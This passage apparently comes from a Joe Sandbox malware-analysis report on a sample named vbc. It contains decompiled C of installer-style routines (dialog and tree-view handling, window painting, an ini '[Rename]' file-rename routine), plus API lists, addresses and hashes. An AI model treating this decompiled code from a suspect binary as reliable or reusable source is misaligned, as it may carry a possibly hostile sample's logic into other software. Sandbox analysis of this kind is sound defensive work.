                                                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_t297);
                                                					_t298 = 0;
                                                					do {
                                                						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                							if(_t298 != 0x20) {
                                                								_v20 = 0;
                                                							}
                                                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                						}
                                                						_t298 = _t298 + 1;
                                                					} while (_t298 < 0x21);
                                                					_t299 = _a16;
                                                					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                					_push(0x15);
                                                					E00404499(_a4);
                                                					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                					_push(0x16);
                                                					E00404499(_a4);
                                                					_t300 = 0;
                                                					_v16 = 0;
                                                					if( *0x434f2c <= 0) {
                                                						L19:
                                                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t319 = _v24 + 8;
                                                						_v32 = _t319;
                                                						do {
                                                							_t278 =  &(_t319[0x10]);
                                                							if( *_t278 != 0) {
                                                								_v64 = _t278;
                                                								_t279 =  *_t319;
                                                								_v88 = _v16;
                                                								_t311 = 0x20;
                                                								_v84 = 0xffff0002;
                                                								_v80 = 0xd;
                                                								_v68 = _t311;
                                                								_v44 = _t300;
                                                								_v72 = _t279 & _t311;
                                                								if((_t279 & 0x00000002) == 0) {
                                                									if((_t279 & 0x00000004) == 0) {
                                                										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									} else {
                                                										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                									}
                                                								} else {
                                                									_v80 = 0x4d;
                                                									_v48 = 1;
                                                									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									_v36 = 1;
                                                									 *( *0x42d260 + _t300 * 4) = _t284;
                                                									_v16 =  *( *0x42d260 + _t300 * 4);
                                                								}
                                                							}
                                                							_t300 = _t300 + 1;
                                                							_t319 =  &(_v32[0x818]);
                                                							_v32 = _t319;
                                                						} while (_t300 <  *0x434f2c);
                                                						if(_v36 != 0) {
                                                							L20:
                                                							if(_v20 != 0) {
                                                								E004044CE(_v8);
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E004044CE(_v12);
                                                								L93:
                                                								return E00404500(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}


























































                                                0x00404f0d
                                                0x00404f26
                                                0x00404f2b
                                                0x00404f33
                                                0x00404f39
                                                0x00404f4f
                                                0x00404f52
                                                0x0040517d
                                                0x00405184
                                                0x00405198
                                                0x00405186
                                                0x00405188
                                                0x0040518b
                                                0x0040518c
                                                0x00405193
                                                0x00405193
                                                0x004051a4
                                                0x004051b2
                                                0x004051b5
                                                0x004051cb
                                                0x00405240
                                                0x00405243
                                                0x00405245
                                                0x0040524f
                                                0x0040525d
                                                0x0040525d
                                                0x0040525f
                                                0x00405269
                                                0x0040526f
                                                0x00405272
                                                0x00405275
                                                0x00405290
                                                0x00405277
                                                0x00405281
                                                0x00405281
                                                0x00405275
                                                0x00405269
                                                0x00000000
                                                0x00405243
                                                0x004051d0
                                                0x004051db
                                                0x004051e0
                                                0x004051e7
                                                0x004051ec
                                                0x004051f0
                                                0x004051fb
                                                0x004051fb
                                                0x004051ff
                                                0x00405203
                                                0x00405207
                                                0x0040521a
                                                0x00405209
                                                0x00405209
                                                0x00405210
                                                0x00405216
                                                0x00405212
                                                0x00405212
                                                0x00405212
                                                0x00405210
                                                0x0040521e
                                                0x00405220
                                                0x00405233
                                                0x00405236
                                                0x00405239
                                                0x00405239
                                                0x00405203
                                                0x00000000
                                                0x004051f0
                                                0x004051d2
                                                0x004051d9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405293
                                                0x00405293
                                                0x0040529a
                                                0x0040530b
                                                0x00405313
                                                0x0040531b
                                                0x0040531b
                                                0x00405324
                                                0x00405326
                                                0x0040532d
                                                0x00405330
                                                0x00405330
                                                0x00405336
                                                0x0040533d
                                                0x00405340
                                                0x00405340
                                                0x00405346
                                                0x0040534c
                                                0x00405352
                                                0x00405352
                                                0x0040535f
                                                0x004054c0
                                                0x004054c7
                                                0x004054e4
                                                0x004054ea
                                                0x004054fc
                                                0x004054fc
                                                0x00000000
                                                0x00405365
                                                0x00405367
                                                0x0040536c
                                                0x00405371
                                                0x00405376
                                                0x00405378
                                                0x00405378
                                                0x00405379
                                                0x0040537a
                                                0x0040537c
                                                0x0040537c
                                                0x00405384
                                                0x004053c5
                                                0x004053c7
                                                0x004053d7
                                                0x004053da
                                                0x004053df
                                                0x004053e6
                                                0x004053e9
                                                0x0040548b
                                                0x00405494
                                                0x0040549c
                                                0x0040549c
                                                0x004054aa
                                                0x004054bb
                                                0x004054bb
                                                0x00000000
                                                0x004054aa
                                                0x004053ef
                                                0x004053f2
                                                0x004053f8
                                                0x004053fd
                                                0x004053ff
                                                0x00405401
                                                0x00405407
                                                0x0040540e
                                                0x00405413
                                                0x0040541a
                                                0x0040541d
                                                0x0040541d
                                                0x00405424
                                                0x00405430
                                                0x00405434
                                                0x00405436
                                                0x00405436
                                                0x00405426
                                                0x00405428
                                                0x00405428
                                                0x00405456
                                                0x00405462
                                                0x00405471
                                                0x00405471
                                                0x00405473
                                                0x00405476
                                                0x0040547f
                                                0x00000000
                                                0x00405386
                                                0x00405391
                                                0x00405394
                                                0x00405399
                                                0x0040539b
                                                0x0040539f
                                                0x004053af
                                                0x004053b9
                                                0x004053bb
                                                0x004053be
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004053a1
                                                0x004053a1
                                                0x004053a7
                                                0x004053a9
                                                0x004053a9
                                                0x004053aa
                                                0x004053ab
                                                0x00000000
                                                0x004053a1
                                                0x00405384
                                                0x0040535f
                                                0x004052a2
                                                0x00000000
                                                0x004052b8
                                                0x004052c2
                                                0x004052c7
                                                0x00000000
                                                0x00000000
                                                0x004052d9
                                                0x004052de
                                                0x004052ea
                                                0x004052ea
                                                0x004052ec
                                                0x004052fb
                                                0x004052fd
                                                0x00405301
                                                0x00405304
                                                0x00000000
                                                0x00405304
                                                0x004052a2
                                                0x00404f58
                                                0x00404f5d
                                                0x00404f66
                                                0x00404f6d
                                                0x00404f7f
                                                0x00404f8a
                                                0x00404f90
                                                0x00404f9e
                                                0x00404fb2
                                                0x00404fb7
                                                0x00404fc4
                                                0x00404fc9
                                                0x00404fdf
                                                0x00404ff0
                                                0x00404ffd
                                                0x00404ffd
                                                0x00405000
                                                0x00405006
                                                0x00405008
                                                0x0040500b
                                                0x00405010
                                                0x00405015
                                                0x00405017
                                                0x00405017
                                                0x00405037
                                                0x00405037
                                                0x00405039
                                                0x0040503a
                                                0x0040503f
                                                0x00405045
                                                0x00405049
                                                0x0040504e
                                                0x00405056
                                                0x0040505a
                                                0x0040505f
                                                0x00405064
                                                0x0040506c
                                                0x0040506f
                                                0x0040513f
                                                0x00405152
                                                0x00000000
                                                0x00405075
                                                0x00405078
                                                0x0040507b
                                                0x0040507e
                                                0x0040507e
                                                0x00405084
                                                0x0040508d
                                                0x00405090
                                                0x00405094
                                                0x00405097
                                                0x0040509a
                                                0x004050a3
                                                0x004050ac
                                                0x004050af
                                                0x004050b2
                                                0x004050b5
                                                0x004050f3
                                                0x0040511e
                                                0x004050f5
                                                0x00405104
                                                0x00405104
                                                0x004050b7
                                                0x004050ba
                                                0x004050c8
                                                0x004050d2
                                                0x004050da
                                                0x004050e1
                                                0x004050ec
                                                0x004050ec
                                                0x004050b5
                                                0x00405124
                                                0x00405125
                                                0x00405131
                                                0x00405131
                                                0x0040513d
                                                0x00405158
                                                0x0040515b
                                                0x00405178
                                                0x00000000
                                                0x0040515d
                                                0x00405162
                                                0x0040516b
                                                0x004054fe
                                                0x00405510
                                                0x00405510
                                                0x0040515b
                                                0x00000000
                                                0x0040513d
                                                0x0040506f

                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                • LoadImageW.USER32 ref: 00404F8A
                                                • SetWindowLongW.USER32 ref: 00404FA3
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                • SetWindowLongW.USER32 ref: 00405152
                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t56;
                                                				intOrPtr _t69;
                                                				signed int _t75;
                                                				signed short* _t76;
                                                				signed short* _t78;
                                                				long _t92;
                                                				int _t103;
                                                				signed int _t110;
                                                				intOrPtr _t113;
                                                				WCHAR* _t114;
                                                				signed int* _t116;
                                                				WCHAR* _t117;
                                                				struct HWND__* _t118;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L13:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x42b234 =  *0x42b234 + 1;
                                                							}
                                                							L27:
                                                							_t114 = _a16;
                                                							L28:
                                                							return E00404500(_a8, _a12, _t114);
                                                						}
                                                						_t56 = GetDlgItem(_a4, 0x3e8);
                                                						_t114 = _a16;
                                                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                							_v12 = _t103;
                                                							_v16 = _t113;
                                                							_v8 = 0x432ea0;
                                                							if(_t103 - _t113 < 0x800) {
                                                								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorW(0, 0x7f02));
                                                								_push(1);
                                                								E00404907(_a4, _v8);
                                                								SetCursor(LoadCursorW(0, 0x7f00));
                                                								_t114 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                							goto L28;
                                                						} else {
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                						goto L27;
                                                					} else {
                                                						_t69 =  *0x42c240; // 0x516114
                                                						_t29 = _t69 + 0x14; // 0x516128
                                                						_t116 = _t29;
                                                						if(( *_t116 & 0x00000020) == 0) {
                                                							goto L27;
                                                						}
                                                						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E004048E3();
                                                						goto L13;
                                                					}
                                                				}
                                                				_t117 = _a16;
                                                				_t75 =  *(_t117 + 0x30);
                                                				if(_t75 < 0) {
                                                					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                				}
                                                				_t76 =  *0x434f38 + _t75 * 2;
                                                				_t110 =  *_t76 & 0x0000ffff;
                                                				_a8 = _t110;
                                                				_t78 =  &(_t76[1]);
                                                				_a16 = _t78;
                                                				_v16 = _t78;
                                                				_v12 = 0;
                                                				_v8 = E00404609;
                                                				if(_t110 != 2) {
                                                					_v8 = E004045CF;
                                                				}
                                                				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                				_push(0x22);
                                                				E00404499(_a4);
                                                				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                				_push(0x23);
                                                				E00404499(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                				_t118 = GetDlgItem(_a4, 0x3e8);
                                                				E004044CE(_t118);
                                                				SendMessageW(_t118, 0x45b, 1, 0);
                                                				_t92 =  *( *0x434f10 + 0x68);
                                                				if(_t92 < 0) {
                                                					_t92 = GetSysColor( ~_t92);
                                                				}
                                                				SendMessageW(_t118, 0x443, 0, _t92);
                                                				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                				 *0x42b234 = 0;
                                                				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                				 *0x42b234 = 0;
                                                				return 0;
                                                			}



















                                                0x0040466a
                                                0x00404797
                                                0x004047f4
                                                0x004047f8
                                                0x004048c5
                                                0x004048c7
                                                0x004048c7
                                                0x004048cd
                                                0x004048cd
                                                0x004048d0
                                                0x00000000
                                                0x004048d7
                                                0x00404806
                                                0x0040480c
                                                0x00404816
                                                0x00404821
                                                0x00404824
                                                0x00404827
                                                0x00404832
                                                0x00404835
                                                0x0040483c
                                                0x00404849
                                                0x0040485a
                                                0x00404860
                                                0x00404868
                                                0x00404876
                                                0x0040487c
                                                0x0040487c
                                                0x0040483c
                                                0x00404886
                                                0x00000000
                                                0x00404891
                                                0x00404895
                                                0x004048a5
                                                0x004048a5
                                                0x004048ab
                                                0x004048b7
                                                0x004048b7
                                                0x00000000
                                                0x004048bb
                                                0x00404886
                                                0x004047a2
                                                0x00000000
                                                0x004047b4
                                                0x004047b4
                                                0x004047b9
                                                0x004047b9
                                                0x004047bf
                                                0x00000000
                                                0x00000000
                                                0x004047e8
                                                0x004047ea
                                                0x004047ef
                                                0x00000000
                                                0x004047ef
                                                0x004047a2
                                                0x00404670
                                                0x00404673
                                                0x00404678
                                                0x00404689
                                                0x00404689
                                                0x00404691
                                                0x00404694
                                                0x00404698
                                                0x0040469b
                                                0x0040469f
                                                0x004046a2
                                                0x004046a5
                                                0x004046a8
                                                0x004046af
                                                0x004046b1
                                                0x004046b1
                                                0x004046bb
                                                0x004046c8
                                                0x004046d2
                                                0x004046d7
                                                0x004046da
                                                0x004046df
                                                0x004046f6
                                                0x004046fd
                                                0x00404710
                                                0x00404713
                                                0x00404727
                                                0x0040472e
                                                0x00404733
                                                0x00404738
                                                0x00404738
                                                0x00404746
                                                0x00404754
                                                0x00404766
                                                0x0040476b
                                                0x0040477b
                                                0x0040477d
                                                0x00000000

                                                APIs
                                                • CheckDlgButton.USER32 ref: 004046F6
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                • GetSysColor.USER32 ref: 00404738
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                • LoadCursorW.USER32 ref: 00404857
                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                • LoadCursorW.USER32 ref: 00404873
                                                • SetCursor.USER32(00000000), ref: 00404876
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x434f10;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                				}
                                                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406183(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t12;
                                                				long _t24;
                                                				char* _t31;
                                                				int _t37;
                                                				void* _t38;
                                                				intOrPtr* _t39;
                                                				long _t42;
                                                				WCHAR* _t44;
                                                				void* _t46;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t52;
                                                				void* _t53;
                                                
                                                				_t38 = __ecx;
                                                				_t44 =  *(_t52 + 0x14);
                                                				 *0x430908 = 0x55004e;
                                                				 *0x43090c = 0x4c;
                                                				if(_t44 == 0) {
                                                					L3:
                                                					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                						_t53 = _t52 + 0x10;
                                                						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                						_t48 = _t12;
                                                						 *(_t53 + 0x18) = _t48;
                                                						if(_t48 != 0xffffffff) {
                                                							_t42 = GetFileSize(_t48, 0);
                                                							_t6 = _t37 + 0xa; // 0xa
                                                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                								L18:
                                                								return CloseHandle(_t48);
                                                							} else {
                                                								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                									if(_t49 == 0) {
                                                										_t48 =  *(_t53 + 0x18);
                                                										L16:
                                                										_t24 = _t42;
                                                										L17:
                                                										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                										SetFilePointer(_t48, 0, 0, 0);
                                                										E004060DF(_t48, _t46, _t42 + _t37);
                                                										GlobalFree(_t46);
                                                										goto L18;
                                                									}
                                                									_t39 = _t46 + _t42;
                                                									_t31 = _t39 + _t37;
                                                									while(_t39 > _t49) {
                                                										 *_t31 =  *_t39;
                                                										_t31 = _t31 - 1;
                                                										_t39 = _t39 - 1;
                                                									}
                                                									_t24 = _t49 - _t46 + 1;
